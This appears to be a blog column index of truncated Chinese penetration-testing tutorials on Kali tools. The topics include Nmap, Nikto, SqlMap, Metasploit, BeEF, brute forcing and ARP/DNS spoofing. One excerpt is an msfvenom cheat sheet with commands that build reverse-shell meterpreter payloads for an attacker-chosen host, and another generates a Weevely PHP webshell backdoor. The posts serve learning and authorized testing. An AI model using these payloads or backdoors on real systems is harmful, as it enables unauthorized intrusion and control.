kaliTools
文章平均质量分 58
zhaji001
https://zhajiyy.github.io/ 此博客不在更新使用,迁移github,希望今后能记录自己的学习之路,同时分享高品质博文!!!
展开
-
Nmap扫描
nmap简介 官方:https://nmap.org/ GitHub:https://github.com/nmap/nmap 参考指南:https://nmap.org/book/man.htmlNmap参数-A 全面扫描-v 增加详细级别-sP Ping扫描-P0 零不是字母O 无Ping扫描-PS TCP SYN Ping扫描-P...原创 2018-10-31 17:14:09 · 253 阅读 · 0 评论 -
安装Anonsurf使Kali Linux匿名
简介https://dropall.github.io/2016-12-20-anonsurf-ip-spoofing/github: https://github.com/Und3rf10w/kali-anonsurf下载Anonsurf从GIT克隆anonsurfroot@kali:~# git clone https://github.com/Und3rf10w/kal...原创 2018-11-16 20:49:43 · 2304 阅读 · 1 评论 -
wpscan
简介WPScan是一个黑盒漏洞扫描程序。WPScan使用Ruby编程语言编写,可帮助检测安全配置,主题,插件和用户权限等问题。在Kali,Pentoo和Samurai WTF WPScan已预先安装。此工具是针对Wordpress的专用扫描器。https://wordpress.org/plugins/ose-wp-scan/github: https://github.com/wpsca...原创 2018-12-19 16:57:34 · 1259 阅读 · 0 评论 -
Nikto
简介https://cirt.net/https://github.com/sullo/nikto攻击机:kali linux靶机: bee-box扫描服务器nikto -h 192.168.1.106 #在没指定端口的情况下它会默认的扫描80nikto -h 192.168.1.106 -p 443 #指定端口 指定为范围(80-90)或逗号分隔列表(80,88,9...原创 2018-12-19 19:00:25 · 562 阅读 · 0 评论 -
BlindElephant使用方法
简介BlindElephant Web应用程序指纹识别器GitHub : https://github.com/lokifer/BlindElephantBlindElephant Web应用程序指纹识别器尝试通过比较已知位置的静态文件与所有可用版本中这些文件的版本的预计算哈希值来发现(已知)Web应用程序的版本。该技术快速,低带宽,非侵入性,通用且高度自动化。0x001 ...原创 2018-12-10 16:55:00 · 1261 阅读 · 0 评论 -
msfvenom备忘录
msfvenom -lLinuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elfmsfvenom -p linux/x64/meterpreter/reverse...原创 2018-12-10 20:45:53 · 238 阅读 · 0 评论 -
joomscan 用法
写在开头的clusterd 这个检查工具真的很很鸡肋,我搭建了四个环境去测试一个都识别不出来tomcat7+9,jboss7+6. 好无奈好无奈,小伙伴们看到就不要在折腾了。简介OWASP JoomScan项目OWASP Joomla!漏洞扫描程序(JoomScan)是一个开源项目,旨在自动执行Joomla CMS部署中的漏洞检测和可靠性保证任务。该工具在Perl中实现,可以无缝轻松地...原创 2018-12-10 23:34:21 · 2475 阅读 · 1 评论 -
Web后门工具weevley
weevley简介Weevely是一款开源项目.只支持(PHP) Webshell,可以模拟类似Telnet的连接,Weevely支持HTTP和SOCKS代理并使用Tor匿名网络。开源 https://github.com/epinna/weevely3演示靶机 dvwa Vulnerability: File Upload low生成后门weevely generate ...原创 2018-10-29 22:02:26 · 716 阅读 · 0 评论 -
commix注入工具
commix简介commix是一款由python编写,开源自动化检测系统命令注入工具 https://github.com/commixproject/commixcommix 参数选项: -v VERBOSE详细程度级别(0-1,默认值:0)。 --version 显示版本号并退出。 --output-dir=.. 设置...原创 2018-10-22 19:43:10 · 3175 阅读 · 0 评论 -
Metasploit(学习笔记)
之前阅读了《Metasploit渗透测试指南》准备更深入了解。MSF终端命令: (kali 中Tab键自动补全)show exploits 列出框架中的渗透攻击模块show payloads 列出框架中攻击载荷show auxiliary 列出框架中辅助攻击模块search name 查找框架中攻击模块info 显示模块的信息use name 选择要使...原创 2018-08-07 15:15:23 · 5180 阅读 · 0 评论 -
欺骗伪装攻击
Ettercap ARP欺骗,Evilgrade DNS欺骗,Metasploit Responder NetBIOS LLMNR欺骗ARP欺骗:假扮网关,拦截任何要离开本地网络的流量.DNS欺骗:DNS名称到IP转换创建一个不正确的响应.能够欺骗用户从攻击者服务器获取恶意数据和用户访问恶意站点. Ettercap ARP欺骗局域网中的windows7:ettercap 支持...原创 2018-08-29 16:27:19 · 3718 阅读 · 0 评论 -
暴力破解工具
需要有一个强大的字典,如果太大了的话,计算机索引不过来,也是没用的.口令的破解全靠运气,运气好几秒钟,几分钟都有可能,运气不好一天二天解不开也正常.总要去尝试暴力破解,会影响机器的CPU,可能会导致拒绝服务的情况.而且还会有拒绝密码登陆这种情况.工具:https://github.com/tearsecurity/leviathanLeviathan是一个大规模审计工具包,具有广泛...原创 2018-08-31 11:23:15 · 10303 阅读 · 0 评论 -
BeEF
官方: https://beefproject.com/GitHub: https://github.com/beefproject/beefkali启动beef:/usr/share/beef-xss# ./beef [15:07:21][*] Bind socket [imapeudora1] listening on [0.0.0.0:2000].[15:07:21][*]...原创 2018-09-17 00:22:07 · 1091 阅读 · 0 评论 -
Web--WAF检测工具
WAFwaf是一个web应用的保护装置,入侵检测系统IDS,入侵阻止系统IPS.nmapnmap -p 80 --script http-waf-detect.nse www.baidu.comNmap scan report for www.baidu.com (61.135.169.125)Host is up (0.0042s latency).Other address...原创 2018-10-18 16:00:00 · 6905 阅读 · 0 评论 -
DNS侦查工具
DNS简介访问某网站的时候,我们只需要打开浏览器输入例如:www.baidu.com就可以解析到该网站.为了便于记住不需要输入长长的IP地址去访问,这时DNS把相对应的域名解析成IP地址,这就是DNS域名解析.关于域名域名的层次划分用点来分割,最低在左边,高的在右边.例如:www.baidu.com.域名服务是基于UDP实现端口号为53.子域名还划分国家,地区,组织.域名还需要...原创 2018-10-16 19:32:03 · 3004 阅读 · 0 评论 -
SqlMap
收集的一些技巧资源来之互联网-u #注入点-f #指纹判别数据库类型-b #获取数据库版本信息-p #指定可测试的参数(?page=1&id=2 -p “page,id”)-D “” #指定数据库名-T “” #指定表名-C “” #指定字段-s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –r...原创 2018-12-18 17:13:17 · 12085 阅读 · 0 评论